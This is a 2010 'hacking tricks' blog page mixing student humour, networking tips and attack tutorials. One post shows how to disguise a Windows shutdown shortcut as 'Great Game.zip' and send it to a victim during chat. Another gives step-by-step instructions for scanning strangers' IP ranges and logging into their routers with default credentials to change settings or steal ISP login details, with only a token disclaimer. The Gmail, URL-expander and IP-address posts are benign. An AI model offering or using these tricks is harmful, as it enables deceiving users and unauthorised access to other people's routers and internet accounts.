studentrocks
Showing posts with label HACKING TRICKS. Show all posts
Showing posts with label HACKING TRICKS. Show all posts

COLLAGE LIFE IS FUN WE MISSED IT ALOT

Wednesday, October 27, 2010

We’ve all been through this, remember ?
Every New Semester
College Life
After 1st Week:
College Life
After 2nd Week:
College Life
Before the Mid-Term Exam:
College Life
During The Mid-Term Exam:
College Life
After The Mid-Term Exam:
College Life
Before the Final Exam:
College Life
Once We get the Schedule of Final exam:
College Life
7 Days Before Final exam:
College Life
6 Days Before Final exam:
College Life
5 Days Before Final exam:
College Life
4 Days Before Final exam:
College Life
3 Days Before Final exam:
College Life
2 Days Before Final exam:
College Life
1 Days Before Final exam:
College Life
Night Before the final exam:
College Life
1 Hour before the final exam:
College Life
During the final exams:
College Life
Once you walk out of the examination room:
College Life
After the final exam during the holiday:
College Life

Read more...

COLLAGE LIFE IS FUN WE MISSED IT ALOT

We’ve all been through this, remember ?
Every New Semester
College Life
After 1st Week:
College Life
After 2nd Week:
College Life
Before the Mid-Term Exam:
College Life
During The Mid-Term Exam:
College Life
After The Mid-Term Exam:
College Life
Before the Final Exam:
College Life
Once We get the Schedule of Final exam:
College Life
7 Days Before Final exam:
College Life
6 Days Before Final exam:
College Life
5 Days Before Final exam:
College Life
4 Days Before Final exam:
College Life
3 Days Before Final exam:
College Life
2 Days Before Final exam:
College Life
1 Days Before Final exam:
College Life
Night Before the final exam:
College Life
1 Hour before the final exam:
College Life
During the final exams:
College Life
Once you walk out of the examination room:
College Life
After the final exam during the holiday:
College Life

Read more...

Shutdown some ones pc while chatting on msn or yahoo

Thursday, October 7, 2010

Hi friends today my post will be regarding hacking msn.The tutorial actually helps youshutdown friends computer while chatting on msn or yahoo.The tutorial actually uses a windows trick to shutdown someones computer

Method:


1) Right click on desktop, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" or anything of your choice

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

After you have given it a name click on finish.
You should now have an icon on your desktop that is called "Hack msn" or whatever name you gave it.
It is also advised you change the icon to something different,So the victim fall for it.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone to shutdown their pc while chatting

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it yourself.

Ok go to start, run type cmd, then in cmd type: shutdown -a.

Read more...

How to save our GMAIL account from hackers

Friday, July 30, 2010


Previously i have posted alot of articles on Gmail hacking.Recently the number of users Gmail users have increased, therefore Gmail have been the major target of lots of hackers.People use Gmail as a primary email and therefore if hackers can gain access to their primary email accounts so therefore they can also hack other accounts associated witth your Gmail account.


A long time back Google introduced the ability to optionally encrypt any transmission to / from GMail and not just the login sequence. Previously Gmail used to encrypt the login sequence only. All other data was transmitted unencrypted over the wire making such hacking possible. Every ething that you are doing on your gmail account is transmitted unencrypted over the web.

This makes Gmail velnurable to Session hijacking, the hacker can force your browser withGmail Hacking tool to send a cookie file.Once the hacker gets the cookies he can login into your gmail account with out your username and password.Any one with basic knowledge of computers can use this tool to hack your gmail password.


How to protect your gmail account from getting hacked?

So this question might arrive in your minds, well the answer is simple you just need to change your browser connection to https.

To change your browser connection to https kindly perform the following steps:


1.Sign in to Gmail.


2.Click Settings at the top of any Gmail page.


3.Set 'Browser Connection' to 'Always use https.'


4.Click Save Changes.


5.Reload Gmail.

That's all you need to protect your GMail account from getting hacked.

Read more...

How to Hack an Ethernet ADSL Router

Friday, July 9, 2010


ADSL-Routers

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.

Before you proceed, you need the following tool in the process

Angry IP Scanner

Here is a detailed information on how to exploit the vulnerability of an ADSL router.

Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.

Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Suppose your IP is 117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.

Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.

IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools

Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.

IP Scanner

Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.

Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.

Router Settings Page

If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.

Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

Warning!

All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.


Read more...

What are Private and Public IP Addresses


Private and Public IP Addresses

Internet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

You can check your public IP address by visiting www.whatismyip.com

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP [...]

Read more...

Know Whats Hidden Inside that Short URL!

Wednesday, June 23, 2010

These days, we see a lot of “Short” URLs on the net. People use several URL shorteners to shorten lengthy URLS for ease of use. But a short URL won’t tell us where we are going. If some one have shorted a URL of a malware site.. we won’t know that we are been tricked until we visit that site! That’s why we should know where we are going!
If you use Twitter, you might have noticed that everyone use short URLS. Even if we use a long URL, Twitterwill automatically shrink it. But nobody knows where these URLS will take you until that page loads in your browser. Because of this problem, recently, Twitter got some big spam and phishing attacks. Some used short URLS to direct you to a false Twitter login page which will steal your login details and use your accountto send more spam!
Recently few bloggers introduced a system which will help you to extract the short URL and tell you where that URL will direct you! KnowURL.com supports almost all the URL shortening sites like bit.ly and tinyurl. Now you can learn where your heading before you step into trouble.
To use this service, simply put your short URL in the given text field and click on “Show URL”. After that they will reveal the true identity of your link within few seconds!

Read more...

Send Messages to Other PCs over LAN on windows

Friday, May 21, 2010

First let’s see how it works on the versions of Windows upto XP SP2

It’s really easy, all you need to do is follow these steps:

  1. Run command prompt (Windows Logo Key + R, then type “cmd.exe”).
    Running Command Prompt

    Running Command Prompt

  2. Type net send x “Your message goes in here between in quotes”, in this command, replace the “x” with the username of the PC on your LAN to which you want the message to be sent. And hit Enter.
    How to use Net Send command

    How to use Net Send command

    If the user is on-line, your message will be sent or else an error message would appear.
  3. You can also send messages to ALL THE PCs connected to your LAN at ONCE! To do that just type this command: net send * “Your message here!”
  4. The star(*) in the above command tells cmd to send the message to all the PCs which are connected to your LAN rather than specifying one (including your PC also) :D



Read more...

  © DESIGN BY OBILLANENI OBILLANENI by OBILLANENI 2008

Back to TOP